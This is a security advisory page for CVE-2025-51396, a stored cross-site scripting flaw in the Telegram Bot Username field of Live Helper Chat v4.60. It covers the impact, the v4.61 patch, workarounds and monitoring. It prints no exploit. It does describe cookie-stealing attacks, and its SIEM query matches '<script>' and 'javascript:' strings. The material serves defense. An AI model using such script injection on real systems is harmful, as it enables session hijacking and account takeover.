CVE-2025-51396
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Live Helper Chat v4.60 allows attackers to inject malicious scripts into the Telegram Bot Username parameter. When other users view the compromised configuration, the scripts execute in their browsers, potentially stealing session cookies or performing unauthorized actions. This affects all administrators and users who access the chat interface.
💻 Affected Systems
- Live Helper Chat
📦 What is this software?
Live Helper Chat by Livehelperchat
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain full administrative access to the chat system, pivot to internal systems, or deploy malware to users' browsers.
Likely Case
Session hijacking of administrators or users, credential theft, defacement of chat interface, or redirection to malicious sites.
If Mitigated
Limited to interface disruption or minor data exposure if proper input validation and output encoding are implemented elsewhere.
🎯 Exploit Status
Exploitation requires administrative access to modify Telegram Bot settings. Proof-of-concept code is publicly available.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v4.61 or later
Vendor Advisory: https://github.com/LiveHelperChat/livehelperchat/pull/2228/commits/2056503ad96e04467ec9af8d827109b9b9b46223
Restart Required: No
Instructions:
1. Backup your current installation. 2. Download the latest version from the official repository. 3. Replace affected files with patched versions. 4. Clear any cached data.
🔧 Temporary Workarounds
Disable Telegram Bot Integration
allTemporarily disable the Telegram Bot feature to prevent exploitation.
Edit configuration to remove Telegram Bot settings or disable the module in admin panel.
Input Validation Filter
linuxImplement server-side input validation for the Telegram Bot Username field.
Add input sanitization in the relevant PHP files to strip HTML/script tags.
🧯 If You Can't Patch
- Restrict administrative access to trusted IP addresses only.
- Implement a web application firewall (WAF) with XSS protection rules.
🔍 How to Verify
Check if Vulnerable:
Check if your Live Helper Chat version is 4.60 by viewing the admin panel or checking the software files.Check Version:
Check the version in the admin interface or examine the software's version file if available.Verify Fix Applied:
After patching, attempt to inject a simple script payload into the Telegram Bot Username field and verify it is properly sanitized or rejected.📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to Telegram Bot settings in admin logs
- HTTP requests containing script tags in the username parameter
Network Indicators:
- Unexpected outbound connections from the chat server to external domains
SIEM Query:
source="livehelperchat.log" AND ("telegram" AND "username" AND ("<script>" OR "javascript:"))